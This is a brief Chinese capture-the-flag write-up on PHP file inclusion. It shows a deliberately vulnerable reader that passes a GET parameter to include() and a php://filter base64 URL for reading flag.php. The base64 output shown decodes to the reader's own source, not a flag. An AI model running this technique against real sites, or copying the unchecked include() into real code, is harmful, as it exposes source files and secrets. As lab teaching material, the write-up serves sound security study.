文件包含
题目要求:
请找到题目中FLAG
漏洞源码
<meta charset='utf-8'>
<center><h1>文件阅读器</h1></center>
<!-- 据说flag在flag.php里 -->
<?php
error_reporting(0);
$f=$_GET['file'];
if(stripos($f,"..")===false)
{
//;
}
else
{
exit('invalid');
}
if(!$f)
{
header('Location: ?file=test.txt');
}
else
{
include($f);
}
?>
测试方法
http://localhost/?file=php://filter/read=convert.base64-encode/resource=flag.php
解开base64就能拿到key了
PG1ldGEgY2hhcnNldD0ndXRmLTgnPg0KPGNlbnRlcj48aDE+5paH5Lu26ZiF6K+75ZmoPC9oMT48L2NlbnRlcj4NCjwhLS0g5o2u6K+0ZmxhZ+WcqGZsYWcucGhw6YeMIC0tPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCiRmPSRfR0VUWydmaWxlJ107DQppZihzdHJpcG9zKCRmLCIuLiIpPT09ZmFsc2UpDQp7DQoJLy87DQp9DQplbHNlDQp7DQoJZXhpdCgnaW52YWxpZCcpOw0KfQ0KaWYoISRmKQ0Kew0KCWhlYWRlcignTG9jYXRpb246ID9maWxlPXRlc3QudHh0Jyk7DQp9DQplbHNlDQp7DQoJaW5jbHVkZSgkZik7DQp9DQo/Pg==